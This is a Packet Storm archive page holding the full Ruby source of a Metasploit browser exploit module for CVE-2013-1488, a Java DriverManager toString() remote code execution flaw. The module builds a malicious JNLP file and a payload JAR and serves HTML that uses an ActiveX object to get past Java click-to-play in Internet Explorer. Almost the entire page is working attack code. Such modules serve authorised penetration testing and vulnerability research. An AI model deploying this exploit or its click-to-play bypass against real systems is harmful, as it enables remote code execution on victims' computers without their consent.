exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Java Applet Driver Manager Privileged toString() Remote Code Execution

Java Applet Driver Manager Privileged toString() Remote Code Execution
Posted Jun 10, 2013
Authored by juan vazquez, James Forshaw | Site metasploit.com

This Metasploit module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes, from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

tags | exploit, java, web, activex
advisories | CVE-2013-1488, OSVDB-91472
SHA-256 | 1b4db1b27c17aab0b21ca54b384927fd35c2a31fb00fd5b3dfb2d240422f385f

Java Applet Driver Manager Privileged toString() Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,
'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
'Description' => %q{
This module abuses the java.sql.DriverManager class where the toString() method
is called over user supplied classes, from a doPrivileged block. The vulnerability
affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE
throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java
Web Start can be launched automatically throw the ActiveX control. Otherwise the
applet is launched without click-to-play bypass.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability discovery and Analysis
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1488' ],
[ 'OSVDB', '91472' ],
[ 'BID', '58504' ],
[ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end


def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")
@driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")
@driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
@object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
@driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)

@jnlp_name = rand_text_alpha(8)

super
end

def jnlp_file
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
<description>#{rand_text_alpha(8)}</description>
<offline-allowed/>
</information>

<resources>
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
</resources>
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
<param name="__applet_ssv_validated" value="true"></param>
</applet-desc>
<update check="background"/>
</jnlp>
|
return jnlp
end

def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")

case request.uri
when /\.jnlp$/i
send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("FakeDriver.class", @driver_class)
jar.add_file("FakeDriver2.class", @driver2_class)
jar.add_file("META-INF/services/java.lang.Object", @object_services)
jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest

send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end

end

def generate_html
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
</body>
</html>
|
return html
end

end
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close